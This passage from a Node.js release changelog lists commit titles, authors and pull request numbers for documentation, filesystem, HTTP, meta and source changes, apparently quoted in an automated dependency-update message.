Singh) [#​61267](https://redirect.github.com/nodejs/node/pull/61267) - \[[`dca7005f9d`](https://redirect.github.com/nodejs/node/commit/dca7005f9d)] - **doc**: mention --newVersion release script (Rafael Gonzaga) [#​61255](https://redirect.github.com/nodejs/node/pull/61255) - \[[`c0dc8ddf85`](https://redirect.github.com/nodejs/node/commit/c0dc8ddf85)] - **doc**: correct typo in api contributing doc (Mike McCready) [#​61260](https://redirect.github.com/nodejs/node/pull/61260) - \[[`066af38fe1`](https://redirect.github.com/nodejs/node/commit/066af38fe1)] - **doc**: add PR-URL requirement for security backports (Rafael Gonzaga) [#​61256](https://redirect.github.com/nodejs/node/pull/61256) - \[[`71dd46bd0c`](https://redirect.github.com/nodejs/node/commit/71dd46bd0c)] - **doc**: add reusePort error behavior to net module (mag123c) [#​61250](https://redirect.github.com/nodejs/node/pull/61250) - \[[`f6abe3ba33`](https://redirect.github.com/nodejs/node/commit/f6abe3ba33)] - **doc**: note corepack package removal in distribution doc (Mike McCready) [#​61207](https://redirect.github.com/nodejs/node/pull/61207) - \[[`9059d49d8c`](https://redirect.github.com/nodejs/node/commit/9059d49d8c)] - **doc**: fix tls.connect() timeout documentation (Azad Gupta) [#​61079](https://redirect.github.com/nodejs/node/pull/61079) - \[[`e7b34b76b0`](https://redirect.github.com/nodejs/node/commit/e7b34b76b0)] - **doc**: missing `passed`, `error` and `passed` properties on `TestContext` (Xavier Stouder) [#​61185](https://redirect.github.com/nodejs/node/pull/61185) - \[[`9ae2dcfbb6`](https://redirect.github.com/nodejs/node/commit/9ae2dcfbb6)] - **doc**: clarify threat model for application-level API exposure (Rafael Gonzaga) [#​61184](https://redirect.github.com/nodejs/node/pull/61184) - \[[`9902331a7c`](https://redirect.github.com/nodejs/node/commit/9902331a7c)] - **doc**: correct options for net.Socket class and socket.connect (Xavier Stouder) [#​61179](https://redirect.github.com/nodejs/node/pull/61179) - \[[`a80122d2fe`](https://redirect.github.com/nodejs/node/commit/a80122d2fe)] - **doc**: document error event on readline InterfaceConstructor (Xavier Stouder) [#​61170](https://redirect.github.com/nodejs/node/pull/61170) - \[[`38d73c9cfa`](https://redirect.github.com/nodejs/node/commit/38d73c9cfa)] - **doc**: add a smooth scrolling effect to the sidebar (btea) [#​59007](https://redirect.github.com/nodejs/node/pull/59007) - \[[`95c51fa984`](https://redirect.github.com/nodejs/node/commit/95c51fa984)] - **doc**: correct invalid collaborator profile (JJ) [#​61091](https://redirect.github.com/nodejs/node/pull/61091) - \[[`f5a044763c`](https://redirect.github.com/nodejs/node/commit/f5a044763c)] - **doc**: exclude compile-time flag features from security policy (Matteo Collina) [#​61109](https://redirect.github.com/nodejs/node/pull/61109) - \[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)] - **doc**: add [@​avivkeller](https://redirect.github.com/avivkeller) to collaborators (Aviv Keller) [#​61115](https://redirect.github.com/nodejs/node/pull/61115) - \[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)] - **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu) [#​61094](https://redirect.github.com/nodejs/node/pull/61094) - \[[`4932322c29`](https://redirect.github.com/nodejs/node/commit/4932322c29)] - **doc**: add File modes cross-references in fs methods (Mohit Raj Saxena) [#​60286](https://redirect.github.com/nodejs/node/pull/60286) - \[[`c84904e047`](https://redirect.github.com/nodejs/node/commit/c84904e047)] - **doc**: add missing `zstd` to mjs example of zlib (Deokjin Kim) [#​60915](https://redirect.github.com/nodejs/node/pull/60915) - \[[`e615b9e2f2`](https://redirect.github.com/nodejs/node/commit/e615b9e2f2)] - **doc**: clarify fileURLToPath security considerations (Rafael Gonzaga) [#​60887](https://redirect.github.com/nodejs/node/pull/60887) - \[[`99e384e6d4`](https://redirect.github.com/nodejs/node/commit/99e384e6d4)] - **doc**: replace column with columnNumber in example of `util.getCallSites` (Deokjin Kim) [#​60881](https://redirect.github.com/nodejs/node/pull/60881) - \[[`9351bb4d02`](https://redirect.github.com/nodejs/node/commit/9351bb4d02)] - **doc**: correct spelling in BUILDING.md (Rich Trott) [#​60875](https://redirect.github.com/nodejs/node/pull/60875) - \[[`e1f6e7fc4d`](https://redirect.github.com/nodejs/node/commit/e1f6e7fc4d)] - **doc**: update debuglog examples to use 'foo-bar' instead of 'foo' (xiaoyao) [#​60867](https://redirect.github.com/nodejs/node/pull/60867) - \[[`ccbb2d7300`](https://redirect.github.com/nodejs/node/commit/ccbb2d7300)] - **doc**: fix typos in changelogs (Rich Trott) [#​60855](https://redirect.github.com/nodejs/node/pull/60855) - \[[`1cb2fe8b35`](https://redirect.github.com/nodejs/node/commit/1cb2fe8b35)] - **doc**: mark module.register as active development (Chengzhong Wu) [#​60849](https://redirect.github.com/nodejs/node/pull/60849) - \[[`ceeb4968a6`](https://redirect.github.com/nodejs/node/commit/ceeb4968a6)] - **doc**: add fullName property to SuiteContext (PaulyBearCoding) [#​60762](https://redirect.github.com/nodejs/node/pull/60762) - \[[`56155909dd`](https://redirect.github.com/nodejs/node/commit/56155909dd)] - **doc**: keep sidebar module visible when navigating docs (Botato) [#​60410](https://redirect.github.com/nodejs/node/pull/60410) - \[[`6b637763d5`](https://redirect.github.com/nodejs/node/commit/6b637763d5)] - **doc**: correct concurrency wording in test() documentation (Azad Gupta) [#​60773](https://redirect.github.com/nodejs/node/pull/60773) - \[[`7183e8ffa1`](https://redirect.github.com/nodejs/node/commit/7183e8ffa1)] - **doc**: clarify that CQ only picks up PRs targeting `main` (René) [#​60731](https://redirect.github.com/nodejs/node/pull/60731) - \[[`d5d94303be`](https://redirect.github.com/nodejs/node/commit/d5d94303be)] - **doc**: clarify license section and add contributor note (KaleruMadhu) [#​60590](https://redirect.github.com/nodejs/node/pull/60590) - \[[`e0210c8f53`](https://redirect.github.com/nodejs/node/commit/e0210c8f53)] - **doc**: correct tls ALPNProtocols types (René) [#​60143](https://redirect.github.com/nodejs/node/pull/60143) - \[[`eff87b498a`](https://redirect.github.com/nodejs/node/commit/eff87b498a)] - **doc**: remove mention of SMS 2FA (Antoine du Hamel) [#​60707](https://redirect.github.com/nodejs/node/pull/60707) - \[[`e77ef94a51`](https://redirect.github.com/nodejs/node/commit/e77ef94a51)] - **doc**: `domain.add()` does not accept timer objects (René) [#​60675](https://redirect.github.com/nodejs/node/pull/60675) - \[[`4fe19c95ea`](https://redirect.github.com/nodejs/node/commit/4fe19c95ea)] - **doc**: update Collaborators list to reflect hybrist handle change (Antoine du Hamel) [#​60650](https://redirect.github.com/nodejs/node/pull/60650) - \[[`eece59b6ce`](https://redirect.github.com/nodejs/node/commit/eece59b6ce)] - **doc**: fix linter issues (Antoine du Hamel) [#​60636](https://redirect.github.com/nodejs/node/pull/60636) - \[[`6e17e596e4`](https://redirect.github.com/nodejs/node/commit/6e17e596e4)] - **doc**: correct values/references for buffer.kMaxLength (René) [#​60305](https://redirect.github.com/nodejs/node/pull/60305) - \[[`ac327ae9a7`](https://redirect.github.com/nodejs/node/commit/ac327ae9a7)] - **doc**: recommend events.once to manage 'close' event (Dan Fabulich) [#​60017](https://redirect.github.com/nodejs/node/pull/60017) - \[[`d9b149ea42`](https://redirect.github.com/nodejs/node/commit/d9b149ea42)] - **doc**: highlight module loading difference between import and require (Ajay A) [#​59815](https://redirect.github.com/nodejs/node/pull/59815) - \[[`f6d62cb22c`](https://redirect.github.com/nodejs/node/commit/f6d62cb22c)] - **doc**: fix typo in `process.unref` documentation (우혁) [#​59698](https://redirect.github.com/nodejs/node/pull/59698) - \[[`6d5078b196`](https://redirect.github.com/nodejs/node/commit/6d5078b196)] - **doc**: add some entries to `glossary.md` (Mohataseem Khan) [#​59277](https://redirect.github.com/nodejs/node/pull/59277) - \[[`b0a5820dea`](https://redirect.github.com/nodejs/node/commit/b0a5820dea)] - **doc**: improve agent.createConnection docs for http and https agents (JaeHo Jang) [#​58205](https://redirect.github.com/nodejs/node/pull/58205) - \[[`b5db02fe67`](https://redirect.github.com/nodejs/node/commit/b5db02fe67)] - **doc**: fix pseudo code in modules.md (chirsz) [#​57677](https://redirect.github.com/nodejs/node/pull/57677) - \[[`e9b912d481`](https://redirect.github.com/nodejs/node/commit/e9b912d481)] - **doc**: add missing variable in code snippet (Koushil Mankali) [#​55478](https://redirect.github.com/nodejs/node/pull/55478) - \[[`44c06c7812`](https://redirect.github.com/nodejs/node/commit/44c06c7812)] - **doc**: add missing word in `single-executable-applications.md` (Konstantin Tsabolov) [#​53864](https://redirect.github.com/nodejs/node/pull/53864) - \[[`482b43f160`](https://redirect.github.com/nodejs/node/commit/482b43f160)] - **doc**: fix typo in http.md (Michael Solomon) [#​59354](https://redirect.github.com/nodejs/node/pull/59354) - \[[`cd323bc718`](https://redirect.github.com/nodejs/node/commit/cd323bc718)] - **doc**: update devcontainer.json and add documentation (Joyee Cheung) [#​60472](https://redirect.github.com/nodejs/node/pull/60472) - \[[`c7c70f3a16`](https://redirect.github.com/nodejs/node/commit/c7c70f3a16)] - **doc**: add haramj as triager (Haram Jeong) [#​60348](https://redirect.github.com/nodejs/node/pull/60348) - \[[`04b8c4d14e`](https://redirect.github.com/nodejs/node/commit/04b8c4d14e)] - **doc**: clarify require(esm) description (dynst) [#​60520](https://redirect.github.com/nodejs/node/pull/60520) - \[[`de382dc832`](https://redirect.github.com/nodejs/node/commit/de382dc832)] - **doc**: instantiate resolver object (Donghoon Nam) [#​60476](https://redirect.github.com/nodejs/node/pull/60476) - \[[`b6845ce460`](https://redirect.github.com/nodejs/node/commit/b6845ce460)] - **doc**: clarify --use-system-ca support status (Joyee Cheung) [#​60340](https://redirect.github.com/nodejs/node/pull/60340) - \[[`0894dae9bc`](https://redirect.github.com/nodejs/node/commit/0894dae9bc)] - **doc**: add missing CAA type to dns.resolveAny() & dnsPromises.resolveAny() (Jimmy Leung) [#​58899](https://redirect.github.com/nodejs/node/pull/58899) - \[[`c86a69f692`](https://redirect.github.com/nodejs/node/commit/c86a69f692)] - **doc**: use `any` for `worker_threads.Worker` 'error' event argument `err` (Jonas Geiler) [#​60300](https://redirect.github.com/nodejs/node/pull/60300) - \[[`0c5031e233`](https://redirect.github.com/nodejs/node/commit/0c5031e233)] - **doc**: update decorator documentation to reflect actual policy (Muhammad Salman Aziz) [#​60288](https://redirect.github.com/nodejs/node/pull/60288) - \[[`b01f710175`](https://redirect.github.com/nodejs/node/commit/b01f710175)] - **doc**: document wildcard supported by tools/test.py (Joyee Cheung) [#​60265](https://redirect.github.com/nodejs/node/pull/60265) - \[[`b4524dabcc`](https://redirect.github.com/nodejs/node/commit/b4524dabcc)] - **doc**: fix `blob.bytes()` heading level (XTY) [#​60252](https://redirect.github.com/nodejs/node/pull/60252) - \[[`5df02776e3`](https://redirect.github.com/nodejs/node/commit/5df02776e3)] - **doc**: fix not working code example in vm docs (Artur Gawlik) [#​60224](https://redirect.github.com/nodejs/node/pull/60224) - \[[`6a4359a0b5`](https://redirect.github.com/nodejs/node/commit/6a4359a0b5)] - **doc**: improve code snippet alternative of url.parse() using WHATWG URL (Steven) [#​60209](https://redirect.github.com/nodejs/node/pull/60209) - \[[`ad06bee70d`](https://redirect.github.com/nodejs/node/commit/ad06bee70d)] - **doc**: use markdown when branch-diff major release (Rafael Gonzaga) [#​60179](https://redirect.github.com/nodejs/node/pull/60179) - \[[`c0d4b11ed4`](https://redirect.github.com/nodejs/node/commit/c0d4b11ed4)] - **doc**: update teams in collaborator-guide.md and add links (Bart Louwers) [#​60065](https://redirect.github.com/nodejs/node/pull/60065) - \[[`20b5ffcac3`](https://redirect.github.com/nodejs/node/commit/20b5ffcac3)] - **doc**: update previous version links in BUILDING (Mike McCready) [#​61457](https://redirect.github.com/nodejs/node/pull/61457) - \[[`de345ea3a3`](https://redirect.github.com/nodejs/node/commit/de345ea3a3)] - **doc**: correct description of `error.stack` accessor behavior (René) [#​61090](https://redirect.github.com/nodejs/node/pull/61090) - \[[`d8418d9de7`](https://redirect.github.com/nodejs/node/commit/d8418d9de7)] - **doc**: fix link in `--env-file=file` section (N. Bighetti) [#​60563](https://redirect.github.com/nodejs/node/pull/60563) - \[[`1107bda21e`](https://redirect.github.com/nodejs/node/commit/1107bda21e)] - **doc**: fix v22 changelog after security release (Marco Ippolito) [#​61371](https://redirect.github.com/nodejs/node/pull/61371) - \[[`42aab9469a`](https://redirect.github.com/nodejs/node/commit/42aab9469a)] - **doc**: add missing history entry for `sqlite.md` (Antoine du Hamel) [#​60607](https://redirect.github.com/nodejs/node/pull/60607) - \[[`deb6d5deff`](https://redirect.github.com/nodejs/node/commit/deb6d5deff)] - **doc, module**: change async customization hooks to experimental (Gerhard Stöbich) [#​60302](https://redirect.github.com/nodejs/node/pull/60302) - \[[`c659add7d1`](https://redirect.github.com/nodejs/node/commit/c659add7d1)] - **doc,src,lib**: clarify experimental status of Web Storage support (Antoine du Hamel) [#​60708](https://redirect.github.com/nodejs/node/pull/60708) - \[[`dda95e91b9`](https://redirect.github.com/nodejs/node/commit/dda95e91b9)] - **esm**: avoid throw when module specifier is not url (Craig Macomber (Microsoft)) [#​61000](https://redirect.github.com/nodejs/node/pull/61000) - \[[`912945be89`](https://redirect.github.com/nodejs/node/commit/912945be89)] - **events**: remove redundant todo (Gürgün Dayıoğlu) [#​60595](https://redirect.github.com/nodejs/node/pull/60595) - \[[`22e156eb10`](https://redirect.github.com/nodejs/node/commit/22e156eb10)] - **events**: remove eventtarget custom inspect branding (Efe) [#​61128](https://redirect.github.com/nodejs/node/pull/61128) - \[[`df6fd9b03f`](https://redirect.github.com/nodejs/node/commit/df6fd9b03f)] - **fs**: remove duplicate getValidatedPath calls (Mert Can Altin) [#​61359](https://redirect.github.com/nodejs/node/pull/61359) - \[[`6ea3e4d850`](https://redirect.github.com/nodejs/node/commit/6ea3e4d850)] - **fs**: fix errorOnExist behavior for directory copy in fs.cp (Nicholas Paun) [#​60946](https://redirect.github.com/nodejs/node/pull/60946) - \[[`dd918b9980`](https://redirect.github.com/nodejs/node/commit/dd918b9980)] - **fs**: fix ENOTDIR in globSync when file is treated as dir (sangwook) [#​61259](https://redirect.github.com/nodejs/node/pull/61259) - \[[`4908e67ba0`](https://redirect.github.com/nodejs/node/commit/4908e67ba0)] - **fs**: remove duplicate fd validation in sync functions (Mert Can Altin) [#​61361](https://redirect.github.com/nodejs/node/pull/61361) - \[[`4a27bce3d9`](https://redirect.github.com/nodejs/node/commit/4a27bce3d9)] - **fs**: detect dot files when using globstar (Robin van Wijngaarden) [#​61012](https://redirect.github.com/nodejs/node/pull/61012) - \[[`b0186ff65c`](https://redirect.github.com/nodejs/node/commit/b0186ff65c)] - **fs**: validate statfs path (Efe) [#​61230](https://redirect.github.com/nodejs/node/pull/61230) - \[[`6689775023`](https://redirect.github.com/nodejs/node/commit/6689775023)] - **gyp**: aix: change gcc version detection so CXX="ccache g++" works (Stewart X Addison) [#​61464](https://redirect.github.com/nodejs/node/pull/61464) - \[[`5c4f4db663`](https://redirect.github.com/nodejs/node/commit/5c4f4db663)] - **http**: fix rawHeaders exceeding maxHeadersCount limit (Max Harari) [#​61285](https://redirect.github.com/nodejs/node/pull/61285) - \[[`7599e2eccd`](https://redirect.github.com/nodejs/node/commit/7599e2eccd)] - **http**: replace startsWith with strict equality (btea) [#​59394](https://redirect.github.com/nodejs/node/pull/59394) - \[[`99a85213bf`](https://redirect.github.com/nodejs/node/commit/99a85213bf)] - **http**: lazy allocate cookies array (Robert Nagy) [#​59734](https://redirect.github.com/nodejs/node/pull/59734) - \[[`7669e6a5ad`](https://redirect.github.com/nodejs/node/commit/7669e6a5ad)] - **http**: fix http client leaky with double response (theanarkh) [#​60062](https://redirect.github.com/nodejs/node/pull/60062) - \[[`f074c126a8`](https://redirect.github.com/nodejs/node/commit/f074c126a8)] - **http,https**: fix double ERR\_PROXY\_TUNNEL emission (Shima Ryuhei) [#​60699](https://redirect.github.com/nodejs/node/pull/60699) - \[[`d8ac368363`](https://redirect.github.com/nodejs/node/commit/d8ac368363)] - **http2**: add diagnostics channels for client stream request body (Darshan Sen) [#​60480](https://redirect.github.com/nodejs/node/pull/60480) - \[[`e26a7e464d`](https://redirect.github.com/nodejs/node/commit/e26a7e464d)] - **http2**: rename variable to additionalPseudoHeaders (Tobias Nießen) [#​60208](https://redirect.github.com/nodejs/node/pull/60208) - \[[`5df634f46e`](https://redirect.github.com/nodejs/node/commit/5df634f46e)] - **http2**: validate initialWindowSize per HTTP/2 spec (Matteo Collina) [#​61402](https://redirect.github.com/nodejs/node/pull/61402) - \[[`2ccc9a6205`](https://redirect.github.com/nodejs/node/commit/2ccc9a6205)] - **http2**: do not crash on mismatched ping buffer length (René) [#​60135](https://redirect.github.com/nodejs/node/pull/60135) - \[[`3e68a5f78a`](https://redirect.github.com/nodejs/node/commit/3e68a5f78a)] - **inspector**: inspect HTTP response body (Chengzhong Wu) [#​60572](https://redirect.github.com/nodejs/node/pull/60572) - \[[`a86ffa9a5d`](https://redirect.github.com/nodejs/node/commit/a86ffa9a5d)] - **inspector**: add network payload buffer size limits (Chengzhong Wu) [#​60236](https://redirect.github.com/nodejs/node/pull/60236) - \[[`ea60ef5d74`](https://redirect.github.com/nodejs/node/commit/ea60ef5d74)] - **lib**: fix typo in `util.js` comment (Taejin Kim) [#​61365](https://redirect.github.com/nodejs/node/pull/61365) - \[[`9d8d9322a4`](https://redirect.github.com/nodejs/node/commit/9d8d9322a4)] - **lib**: fix TypeScript support check in jitless mode (sangwook) [#​61382](https://redirect.github.com/nodejs/node/pull/61382) - \[[`fc26f5c78f`](https://redirect.github.com/nodejs/node/commit/fc26f5c78f)] - **lib**: gbk decoder is gb18030 decoder per spec (Сковорода Никита Андреевич) [#​61099](https://redirect.github.com/nodejs/node/pull/61099) - \[[`3b87030012`](https://redirect.github.com/nodejs/node/commit/3b87030012)] - **lib**: enforce use of `URLParse` (Antoine du Hamel) [#​61016](https://redirect.github.com/nodejs/node/pull/61016) - \[[`2a7479d4fc`](https://redirect.github.com/nodejs/node/commit/2a7479d4fc)] - **lib**: use `FastBuffer` for empty buffer allocation (Gürgün Dayıoğlu) [#​60558](https://redirect.github.com/nodejs/node/pull/60558) - \[[`7cf4c43582`](https://redirect.github.com/nodejs/node/commit/7cf4c43582)] - **lib**: fix constructor in \_errnoException stack tree (SeokHun) [#​60156](https://redirect.github.com/nodejs/node/pull/60156) - \[[`f9d87fbfaa`](https://redirect.github.com/nodejs/node/commit/f9d87fbfaa)] - **lib**: fix typo in QuicSessionStats (SeokHun) [#​60155](https://redirect.github.com/nodejs/node/pull/60155) - \[[`8d26ccc652`](https://redirect.github.com/nodejs/node/commit/8d26ccc652)] - **lib**: remove redundant destroyHook checks (Gürgün Dayıoğlu) [#​60120](https://redirect.github.com/nodejs/node/pull/60120) - \[[`705832a1be`](https://redirect.github.com/nodejs/node/commit/705832a1be)] - **lib,src**: isInsideNodeModules should test on the first non-internal frame (Chengzhong Wu) [#​60991](https://redirect.github.com/nodejs/node/pull/60991) - \[[`6f39ad190b`](https://redirect.github.com/nodejs/node/commit/6f39ad190b)] - **meta**: do not fast-track npm updates (Antoine du Hamel) [#​61475](https://redirect.github.com/nodejs/node/pull/61475) - \[[`a6a0ff9486`](https://redirect.github.com/nodejs/node/commit/a6a0ff9486)] - **meta**: fix typos in issue template config (Daijiro Wachi) [#​61399](https://redirect.github.com/nodejs/node/pull/61399) - \[[`ec88c9b378`](https://redirect.github.com/nodejs/node/commit/ec88c9b378)] - **meta**: label v8 module PRs (René) [#​61325](https://redirect.github.com/nodejs/node/pull/61325) - \[[`83143835de`](https://redirect.github.com/nodejs/node/commit/83143835de)] - **meta**: bump step-security/harden-runner from 2.13.2 to 2.14.0 (dependabot\[bot]) [#​61245](https://redirect.github.com/nodejs/node/pull/61245) - \[[`0802dc663a`](https://redirect.github.com/nodejs/node/commit/0802dc663a)] - **meta**: bump actions/setup-node from 6.0.0 to 6.1.0 (dependabot\[bot]) [#​61244](https://redirect.github.com/nodejs/node/pull/61244) - \[[`587db55796`](https://redirect.github.com/nodejs/node/commit/587db55796)] - **meta**: bump actions/cache from 4.3.0 to 5.0.1 (dependabot\[bot]) [#​61243](https://redirect.github.com/nodejs/node/pull/61243) - \[[`262c9d37a6`](https://redirect.github.com/nodejs/node/commit/262c9d37a6)] - **meta**: bump github/codeql-action from 4.31.6 to 4.31.9 (dependabot\[bot]) [#​61241](https://redirect.github.com/nodejs/node/pull/61241) - \[[`d9763b5afd`](https://redirect.github.com/nodejs/node/commit/d9763b5afd)] - **meta**: bump codecov/codecov-action from 5.5.1 to 5.5.2 (dependabot\[bot]) [#​61240](https://redirect.github.com/nodejs/node/pull/61240) - \[[`0af73d1811`](https://redirect.github.com/nodejs/node/commit/0af73d1811)] - **meta**: bump peter-evans/create-pull-request from 7.0.9 to 8.0.0 (dependabot\[bot]) [#​61237](https://redirect.github.com/nodejs/node/pull/61237) - \[[`8be6afd239`](https://redirect.github.com/nodejs/node/commit/8be6afd239)] - **meta**: move lukekarrys to emeritus (Node.js GitHub Bot) [#​60985](https://redirect.github.com/nodejs/node/pull/60985) - \[[`c497de5c74`](https://redirect.github.com/nodejs/node/commit/c497de5c74)] - **meta**: bump actions/setup-python from 6.0.0 to 6.1.0 (dependabot\[bot]) [#​60927](https://redirect.github.com/nodejs/node/pull/60927) - \[[`774920f169`](https://redirect.github.com/nodejs/node/commit/774920f169)] - **meta**: bump github/codeql-action from 4.31.3 to 4.31.6 (dependabot\[bot]) [#​60926](https://redirect.github.com/nodejs/node/pull/60926) - \[[`ef3b1e5991`](https://redirect.github.com/nodejs/node/commit/ef3b1e5991)] - **meta**: bump peter-evans/create-pull-request from 7.0.8 to 7.0.9 (dependabot\[bot]) [#​60924](https://redirect.github.com/nodejs/node/pull/60924) - \[[`3ed667379f`](https://redirect.github.com/nodejs/node/commit/3ed667379f)] - **meta**: bump github/codeql-action from 4.31.2 to 4.31.3 (dependabot\[bot]) [#​60770](https://redirect.github.com/nodejs/node/pull/60770) - \[[`7c0cefb126`](https://redirect.github.com/nodejs/node/commit/7c0cefb126)] - **meta**: bump step-security/harden-runner from 2.13.1 to 2.13.2 (dependabot\[bot]) [#​60769](https://redirect.github.com/nodejs/node/pull/60769) - \[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)] - **meta**: add Renegade334 to collaborators (Renegade334) [#​60714](https://redirect.github.com/nodejs/node/pull/60714) - \[[`4f4dda2a18`](https://redirect.github.com/nodejs/node/commit/4f4dda2a18)] - **meta**: bump actions/download-artifact from 5.0.0 to 6.0.0 (dependabot\[bot]) [#​60532](https://redirect.github.com/nodejs/node/pull/60532) - \[[`c436f8d57c`](https://redirect.github.com/nodejs/node/commit/c436f8d57c)] - **meta**: bump actions/upload-artifact from 4.6.2 to 5.0.0 (dependabot\[bot]) [#​60531](https://redirect.github.com/nodejs/node/pull/60531) - \[[`402d9f87a6`](https://redirect.github.com/nodejs/node/commit/402d9f87a6)] - **meta**: bump github/codeql-action from 3.30.5 to 4.31.2 (dependabot\[bot]) [#​60533](https://redirect.github.com/nodejs/node/pull/60533) - \[[`61be78e326`](https://redirect.github.com/nodejs/node/commit/61be78e326)] - **meta**: bump actions/setup-node from 5.0.0 to 6.0.0 (dependabot\[bot]) [#​60529](https://redirect.github.com/nodejs/node/pull/60529) - \[[`7e4164a623`](https://redirect.github.com/nodejs/node/commit/7e4164a623)] - **meta**: bump actions/stale from 10.0.0 to 10.1.0 (dependabot\[bot]) [#​60528](https://redirect.github.com/nodejs/node/pull/60528) - \[[`1bf6e1d010`](https://redirect.github.com/nodejs/node/commit/1bf6e1d010)] - **meta**: move one or more collaborators to emeritus (Node.js GitHub Bot) [#​60325](https://redirect.github.com/nodejs/node/pull/60325) - \[[`c66fc0e9cf`](https://redirect.github.com/nodejs/node/commit/c66fc0e9cf)] - **meta**: loop userland-migrations in deprecations (Chengzhong Wu) [#​60299](https://redirect.github.com/nodejs/node/pull/60299) - \[[`e4be0791e7`](https://redirect.github.com/nodejs/node/commit/e4be0791e7)] - **meta**: call `create-release-post.yml` post release (Aviv Keller) [#​60366](https://redirect.github.com/nodejs/node/pull/60366) - \[[`8674f6527f`](https://redirect.github.com/nodejs/node/commit/8674f6527f)] - **module**: preserve URL in the parent created by createRequire() (Joyee Cheung) [#​60974](https://redirect.github.com/nodejs/node/pull/60974) - \[[`41db87a975`](https://redirect.github.com/nodejs/node/commit/41db87a975)] - **msi**: fix WiX warnings (Stefan Stojanovic) [#​60251](https://redirect.github.com/nodejs/node/pull/60251) - \[[`884f313f40`](https://redirect.github.com/nodejs/node/commit/884f313f40)] - **node-api**: use Node-API in comments (Vladimir Morozov) [#​61320](https://redirect.github.com/nodejs/node/pull/61320) - \[[`375164190b`](https://redirect.github.com/nodejs/node/commit/375164190b)] - **node-api**: use local files for instanceof test (Vladimir Morozov) [#​60190](https://redirect.github.com/nodejs/node/pull/60190) - \[[`972a1107c0`](https://redirect.github.com/nodejs/node/commit/972a1107c0)] - **os**: freeze signals constant (Xavier Stouder) [#​61038](https://redirect.github.com/nodejs/node/pull/61038) - \[[`e992057ab7`](https://redirect.github.com/nodejs/node/commit/e992057ab7)] - **perf\_hooks**: fix stack overflow error (Antoine du Hamel) [#​60084](https://redirect.github.com/nodejs/node/pull/60084) - \[[`0bb1814fdf`](https://redirect.github.com/nodejs/node/commit/0bb1814fdf)] - **repl**: fix pasting after moving the cursor to the left (Ruben Bridgewater) [#​60470](https://redirect.github.com/nodejs/node/pull/60470) - \[[`35a12fb996`](https://redirect.github.com/nodejs/node/commit/35a12fb996)] - **src**: replace `ranges::sort` for libc++13 compatibility on armhf (Rebroad) [#​61789](https://redirect.github.com/nodejs/node/pull/61789) - \[[`dbf00d4664`](https://redirect.github.com/nodejs/node/commit/dbf00d4664)] - **src**: add missing override specifier to Clean() (Tobias Nießen) [#​61429](https://redirect.github.com/nodejs/node/pull/61429) - \[[`140eba35d3`](https://redirect.github.com/nodejs/node/commit/140eba35d3)] - **src**: cache context lookup in vectored io loops (Mert Can Altin) [#​61387](https://redirect.github.com/nodejs/node/pull/61387) - \[[`93e7e1708b`](https://redirect.github.com/nodejs/node/commit/93e7e1708b)] - **src**: use C++ nullptr in webstorage (Tobias Nießen) [#​61407](https://redirect.github.com/nodejs/node/pull/61407) - \[[`ef868447bc`](https://redirect.github.com/nodejs/node/commit/ef868447bc)] - **src**: fix pointer alignment (jhofstee) [#​61336](https://redirect.github.com/nodejs/node/pull/61336) - \[[`a96256524c`](https://redirect.github.com/nodejs/node/commit/a96256524c)] - **src**: dump snapshot source with node:generate\_default\_snapshot\_source (Joyee Cheung) [#​61101](https://redirect.github.com/nodejs/node/pull/61101) - \[[`ec051b9efd`](https://redirect.github.com/nodejs/node/commit/ec051b9efd)] - **src**: add HandleScope to edge loop in heap\_utils (Mert Can Altin) [#​60885](https://redirect.github.com/nodejs/node/pull/60885) - \[[`41749eb5d6`](https://redirect.github.com/nodejs/node/commit/41749eb5d6)] - **src**: remove redundant CHECK (Tobias Nießen) [#​61130](https://redirect.github.com/nodejs/node/pull/61130) - \[[`57c81e5af3`](https://redirect.github.com/nodejs/node/commit/57c81e5af3)] - **src**: fix off-thread cert loading in bundled cert mode (Joyee Cheung) [#​60764](https://redirect.github.com/nodejs/node/pull/60764) - \[[`4b0616e024`](https://redirect.github.com/nodejs/node/commit/4b0616e024)] - **src**: handle DER decoding errors from system certificates (Joyee Cheung) [#​60787](https://redirect.github.com/nodejs/node/pull/60787) - \[[`93393371f9`](https://redirect.github.com/nodejs/node/commit/93393371f9)] - **src**: use static\_cast instead of C-style cast (Michaël Zasso) [#​60868](https://redirect.github.com/nodejs/node/pull/60868) - \[[`900445b655`](https://redirect.github.com/nodejs/node/commit/900445b655)] - **src**: move Node-API version detection to where it is used (Anna Henningsen) [#​60512](https://redirect.github.com/nodejs/node/pull/60512) - \[[`8353a6da2a`](https://redirect.github.com/nodejs/node/commit/8353a6da2a)] - **src**: avoid C strings in more C++ exception throws (Anna Henningsen) [#​60592](https://redirect.github.com/nodejs/node/pull/60592) - \[[`27c860c51f`](https://redirect.github.com/nodejs/node/commit/27c860c51f)] - **src**: move `napi_addon_register_func` to `node_api_types.h` (Anna Henningsen) [#​60512](https://redirect.github.com/nodejs/node/pull/60512) - \[[`e0517752e7`](https://redirect.github.com/nodejs/node/commit/e0517752e7)] - **src**: remove unconditional NAPI\_EXPERIMENTAL in node.h (Chengzhong Wu) [#​60345](https://redirect.github.com/nodejs/node/pull/60345) - \[[`21e2a52f8e`](https://redirect.github.com/nodejs/node/commit/21e2a52f8e)] - **src**: clean up generic counter implementation (Anna Henningsen) [#​60447](https://redirect.github.com/nodejs/node/pull/60447) - \[[`aed23cb8ca`](https://redirect.github.com/nodejs/node/commit/aed23cb8ca)] - **src**: add enum handle for ToStringHelper + formatting (Burkov Egor) [#​56829](https://redirect.github.com/nodejs/node/pull/56829) - \[[`2e93650ebc`](https://redirect.github.com/nodejs/node/commit/2e93650ebc)] - **src**: fix timing of snapshot serialize callback (Joyee Cheung) [#​60434](https://redirect.github.com/nodejs/node/pull/60434) - \[[`ece4acc18f`](https://redirect.github.com/nodejs/node/commit/ece4acc18f)] - **src**: add COUNT\_GENERIC\_USAGE utility for tests (Joyee Cheung) [#​60434](https://redirect.github.com/nodejs/node/pull/60434) - \[[`31c8e9d9ff`](https://redirect.github.com/nodejs/node/commit/31c8e9d9ff)] - **src**: use cached primordials\_string (Sohyeon Kim) [#​60255](https://redirect.github.com/nodejs/node/pull/60255) - \[[`7f0ffddc14`](https://redirect.github.com/nodejs/node/commit/7f0ffddc14)] - **src**: implement Windows-1252 encoding support and update related tests (Mert Can Altin) 